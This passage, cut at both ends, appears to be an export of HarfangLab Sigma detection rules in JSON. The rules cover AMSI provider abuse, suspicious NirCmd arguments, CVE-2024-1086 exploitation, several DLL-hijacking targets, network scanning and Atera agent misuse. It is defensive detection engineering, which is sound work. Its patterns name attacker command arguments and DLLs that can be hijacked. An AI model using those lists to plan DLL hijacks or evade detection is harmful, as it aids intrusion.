'HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{575001B9-9064-4049-B30E-D83C678E5E2A}'\n\n exclusion_avira:\n ProcessImage: '?:\\Program Files\\Avira\\Endpoint Protection SDK\\endpointprotection.exe'\n\n exclusion_fidelis:\n ProcessParentImage: '?:\\Program Files\\Fidelis\\Endpoint\\Platform\\services\\protect\\protect.exe'\n\n exclusion_cisco:\n 
ProcessSigned: 'true'\n ProcessSignature: 'Cisco Systems, Inc.'\n\n exclusion_tmasmi:\n ProcessCommandLine: '?:\\Windows\\system32\\regsvr32.exe /s ?:\\Windows\\system32\\TmAMSI\\TmAMSIProvider64.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad7629c3-3ff9-463b-9a5d-e23eedac07fc",
"rule_name": "AMSI Provider Added in Registry",
"rule_description": "Detects the registration of an Antimalware Scan Interface (AMSI) provider in the registry.\nAMSI is a Windows defense mechanism designed to combat fileless malware.\nAdversaries can register a malicious AMSI provider to run malicious code whenever the AMSI is triggered to achieve persistence and defense evasion.\nAMSI provider registrations must come from security products such as anti-virus or EDR.\nThe AMSI DLL path can be found in registry location HKCR\\CLSID\\\\InProcServer32\\(Default).\nIt is recommended to ensure the legitimacy of this action by analyzing the DLL pointed to by the registered CLSID in registry or by investigating the process responsible for the registry modification.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ad9a4851-d601-4528-a0d2-a3d77b050741",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295767Z",
"creation_date": "2026-03-23T11:45:35.295770Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295777Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/1ZRR4H/status/1575364101148114944",
"https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf",
"https://www.nirsoft.net/utils/nircmd.html",
"https://attack.mitre.org/techniques/T1059/"
],
"name": "t1059_suspicious_execution_of_nircmd.yml",
"content": "title: Suspicious NirCmd Execution\nid: ad9a4851-d601-4528-a0d2-a3d77b050741\ndescription: |\n Detects a suspicious execution of the NirCmd.\n NirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\n It can also be used by attackers to execute commands while evading defenses.\n This rule detects the usage of suspicious arguments, usually used by attackers.\n It is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\nreferences:\n - https://twitter.com/1ZRR4H/status/1575364101148114944\n - https://cert.pl/uploads/docs/CERT_Polska_Energy_Sector_Incident_Report_2025.pdf\n - https://www.nirsoft.net/utils/nircmd.html\n - https://attack.mitre.org/techniques/T1059/\ndate: 2022/11/03\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.NirCmd\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - OriginalFileName: 'nircmd.exe'\n - Image|endswith: '\\nircmd.exe'\n\n selection_path:\n - Image:\n - '?:\\nircmd.exe'\n # AtomicRedTeam\n - '*\\ExternalPayloads\\nircmd.exe'\n - Image|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Program Files\\'\n - '?:\\\\?Recycle.Bin\\'\n\n selection_suspicious_commandline:\n CommandLine|contains:\n - ' elevatecmd '\n - ' execmd '\n - ' exec '\n - ' exec2 '\n - ' runassystem '\n - ' service '\n - ' savescreenshot '\n - ' savescreenshotfull '\n\n exclusion_mpladmin:\n ParentImage|endswith: '\\MPLAdmin.exe'\n\n # C:\\Program Files\\QGIS 2.18\\bin\\nircmd.exe exec hide 
C:\\PROGRA~1\\QGIS2~1.18\\bin\\qgis.bat\n # nircmd shortcut C:\\PROGRA~1\\QGIS3~1.16\\bin\\nircmd.exe C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\QGIS 3.16 Qt Designer with QGIS 3.16.4 custom widgets exec hide \"C:\\PROGRA~1\\QGIS3~1.16\\bin\\qgis-ltr-designer.bat\" C:\\PROGRA~1\\QGIS3~1.16\\apps\\qgis-ltr\\icons\\QGIS.ico ~$folder.mydocuments$\n exclusion_qgis:\n - CommandLine:\n - '?:\\Program Files\\QGIS*\\bin\\nircmd.exe exec hide ?:\\\\*\\\\*.bat'\n - '?:\\Program Files\\QGIS*\\bin\\nircmd.exe exec hide ?:\\\\*\\\\*.bat *'\n - '?:\\Program Files (x86)\\QGIS*\\bin\\nircmd.exe exec hide ?:\\\\*\\\\*.bat'\n - '*\\QGIS\\bin\\nircmd.exe exec hide *\\QGIS\\bin\\qgis.bat'\n - '*\\Qgis*\\bin\\nircmd.exe exec hide *\\Qgis*\\bin\\\\*.bat'\n - 'nircmd shortcut ?:\\\\*\\nircmd.exe * exec hide *?:\\\\*\\bin\\\\*.bat* *'\n - 'nircmd shortcut *\\Qgis*\\bin\\nircmd.exe * exec hide *\\Qgis*\\bin\\\\*.bat *'\n - ParentCommandLine: '?:\\windows\\system32\\cmd.exe /c etc\\postinstall\\qgis*.bat'\n\n exclusion_santesocial:\n - Image: '?:\\ProgramData\\santesocial\\galss\\inf\\nircmd.exe'\n - CommandLine: '?:\\Program Files (x86)\\santesocial\\srvsvcnam\\nircmd.exe exec hide *.bat'\n ParentCommandLine: '?:\\WINDOWS\\system32\\msiexec.exe /V'\n\n exclusion_token2:\n Image|endswith: '\\scrn.dll'\n ProcessParentProduct: 'USB Config Tool'\n ProcessParentCompany: 'TOKEN2'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ad9a4851-d601-4528-a0d2-a3d77b050741",
"rule_name": "Suspicious NirCmd Execution",
"rule_description": "Detects a suspicious execution of the NirCmd.\nNirCmd is a command-line utility allowing users to perform useful tasks, such as updating registry keys, executing commands, updating network configuration, editing files, etc.\nIt can also be used by attackers to execute commands while evading defenses.\nThis rule detects the usage of suspicious arguments, usually used by attackers.\nIt is recommended to investigate the actions that were performed by NirCmd as well as NirCmd's execution context to determine its legitimacy.\n",
"rule_creation_date": "2022-11-03",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ada4546b-ac75-4f2a-bef1-78bc2ae66763",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613840Z",
"creation_date": "2026-03-23T11:45:34.613844Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613851Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://pwning.tech/nftables/",
"https://github.com/Notselwyn/CVE-2024-1086",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_cve_2024_1086_exploitation.yml",
"content": "title: Netfilter CVE-2024-1086 Vulnerability Exploited\nid: ada4546b-ac75-4f2a-bef1-78bc2ae66763\ndescription: |\n Detects the exploitation of CVE-2024-1086 related to a vulnerability in the Linux kernel's netfilter, affecting Linux kernels between v5.14 and v6.6.\n This vulnerability abuses a use-after-free in the nf_tables subsystem that can be exploited to achieve local privilege escalation.\n It is recommended to investigate both the command launched by this shell and all the processes executed before this alert.\nreferences:\n - https://pwning.tech/nftables/\n - https://github.com/Notselwyn/CVE-2024-1086\n - https://attack.mitre.org/techniques/T1068/\ndate: 2024/03/28\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2024-1086\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Exploit.CVE-2024-1086\n - classification.Linux.Exploit.Netfilter\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n ParentCommandLine|endswith: ' /proc/*/fd/* -q -- binfmt-????'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ada4546b-ac75-4f2a-bef1-78bc2ae66763",
"rule_name": "Netfilter CVE-2024-1086 Vulnerability Exploited",
"rule_description": "Detects the exploitation of CVE-2024-1086 related to a vulnerability in the Linux kernel's netfilter, affecting Linux kernels between v5.14 and v6.6.\nThis vulnerability abuses a use-after-free in the nf_tables subsystem that can be exploited to achieve local privilege escalation.\nIt is recommended to investigate both the command launched by this shell and all the processes executed before this alert.\n",
"rule_creation_date": "2024-03-28",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae0999e2-bd3b-4165-acbc-157ab979e14f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081131Z",
"creation_date": "2026-03-23T11:45:34.081133Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081137Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoft_uev_synccontroller.yml",
"content": "title: DLL Hijacking via Microsoft.Uev.SyncController.exe\nid: ae0999e2-bd3b-4165-acbc-157ab979e14f\ndescription: |\n Detects potential Windows DLL Hijacking via Microsoft.Uev.SyncController.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'Microsoft.Uev.SyncController.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\npmproxy.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae0999e2-bd3b-4165-acbc-157ab979e14f",
"rule_name": "DLL Hijacking via Microsoft.Uev.SyncController.exe",
"rule_description": "Detects potential Windows DLL Hijacking via Microsoft.Uev.SyncController.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae29f29b-fc65-464d-a199-837b6e64b76d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083508Z",
"creation_date": "2026-03-23T11:45:34.083510Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083515Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.softperfect.com/products/networkscanner/",
"https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware",
"https://attack.mitre.org/techniques/T1046/"
],
"name": "t1046_softperfect_network_scanner.yml",
"content": "title: SoftPerfect Network Scanner Execution\nid: ae29f29b-fc65-464d-a199-837b6e64b76d\ndescription: |\n Detects the execution of SoftPerfect Network Scanner, a tool that may be used by adversaries during the reconnaissance phase to gather information and identify potential targets for lateral movement.\n SoftPerfect Network Scanner is a legitimate network scanning tool designed for network discovery and troubleshooting, but it can also be abused by attackers to map networks and identify systems of interest for exploitation.\n The detection relies on the binary's version information (Company and Product fields); a build with stripped or altered metadata will not match.\n It is recommended to investigate the execution of SoftPerfect Network Scanner to determine if it has legitimate purposes, review network traffic for unusual scanning patterns, and correlate with other reconnaissance activities.\n If this is legitimate and recurrent in your network, consider whitelisting the legitimate hosts or users, or disabling this rule.\nreferences:\n - https://www.softperfect.com/products/networkscanner/\n - https://www.microsoft.com/en-us/security/blog/2023/07/06/the-five-day-job-a-blackbyte-ransomware-intrusion-case-study/\n - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\n - https://attack.mitre.org/techniques/T1046/\ndate: 2023/03/21\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1046\n - attack.t1135\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.NetworkScan\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Company|contains: 'SoftPerfect' # SoftPerfect, SoftPerfect Research, SoftPerfect Pty Ltd\n Product:\n - 'Network Scanner'\n - 'SoftPerfect Network Scanner'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae29f29b-fc65-464d-a199-837b6e64b76d",
"rule_name": "SoftPerfect Network Scanner Execution",
"rule_description": "Detects the execution of SoftPerfect Network Scanner, a tool that may be used by adversaries during the reconnaissance phase to gather information and identify potential targets for lateral movement.\nSoftPerfect Network Scanner is a legitimate network scanning tool designed for network discovery and troubleshooting, but it can also be abused by attackers to map networks and identify systems of interest for exploitation.\nThe detection relies on the binary's version information (Company and Product fields); a build with stripped or altered metadata will not match.\nIt is recommended to investigate the execution of SoftPerfect Network Scanner to determine if it has legitimate purposes, review network traffic for unusual scanning patterns, and correlate with other reconnaissance activities.\nIf this is legitimate and recurrent in your network, consider whitelisting the legitimate hosts or users, or disabling this rule.\n",
"rule_creation_date": "2023-03-21",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1046",
"attack.t1135"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae920411-dd3a-4c3b-ac96-58123a3717c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082978Z",
"creation_date": "2026-03-23T11:45:34.082980Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082985Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/MaxRogers5/status/1572655029018038272",
"https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_suspicious_execution_of_atera_agent.yml",
"content": "title: Suspicious Atera Agent Execution\nid: ae920411-dd3a-4c3b-ac96-58123a3717c1\ndescription: |\n Detects suspicious execution of the legitimate remote access tool Atera Agent.\n Attackers can abuse Atera Agent by installing it with an IntegratorLogin parameter pointing to an attacker-controlled e-mail address, typically on a free webmail provider, thus gaining remote access to the host.\n This rule only matches the webmail domains listed in the detection; an attacker enrolling with another provider will not trigger it.\n It is recommended to investigate any actions taken by Atera and to determine if this RMM tool is expected in your environment.\nreferences:\n - https://twitter.com/MaxRogers5/status/1572655029018038272\n - https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2022/09/26\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.Atera\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_process:\n OriginalFileName: 'AteraAgent.exe'\n\n selection_arg:\n CommandLine|contains: 'IntegratorLogin'\n\n selection_email:\n CommandLine|contains:\n - '@outlook'\n - '@hotmail'\n - '@msn'\n - '@aol'\n - '@yahoo'\n - '@live'\n - '@yandex'\n - '@gmail'\n - '@protonmail'\n - '@mail.ru'\n - '@mailto.plus'\n - '@dropmail'\n - '@firemail.com.br' # https://x.com/johnk3r/status/1854695923537805598\n\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae920411-dd3a-4c3b-ac96-58123a3717c1",
"rule_name": "Suspicious Atera Agent Execution",
"rule_description": "Detects suspicious execution of the legitimate remote access tool Atera Agent.\nAttackers can abuse Atera Agent by installing it with an IntegratorLogin parameter pointing to an attacker-controlled e-mail address, typically on a free webmail provider, thus gaining remote access to the host.\nThis rule only matches the webmail domains listed in the detection; an attacker enrolling with another provider will not trigger it.\nIt is recommended to investigate any actions taken by Atera and to determine if this RMM tool is expected in your environment.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae9dc9ce-dd60-4db1-a501-dc8fa2125417",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618825Z",
"creation_date": "2026-03-23T11:45:34.618827Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618832Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logonui.yml",
"content": "title: DLL Hijacking via logonui.exe\nid: ae9dc9ce-dd60-4db1-a501-dc8fa2125417\ndescription: |\n Detects potential Windows DLL Hijacking via logonui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'logonui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\logoncontroller.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ae9dc9ce-dd60-4db1-a501-dc8fa2125417",
"rule_name": "DLL Hijacking via logonui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via logonui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ae9fae6e-37ff-4753-b87f-5414d285d5ea",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098797Z",
"creation_date": "2026-03-23T11:45:34.098799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098803Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_netdom.yml",
"content": "title: DLL Hijacking via netdom.exe\nid: ae9fae6e-37ff-4753-b87f-5414d285d5ea\ndescription: |\n Detects potential Windows DLL Hijacking via netdom.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'NETDOM.EXE'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\cryptdll.dll'\n - '\\dnsapi.dll'\n - '\\dsparse.dll'\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\netjoin.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\sspicli.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - 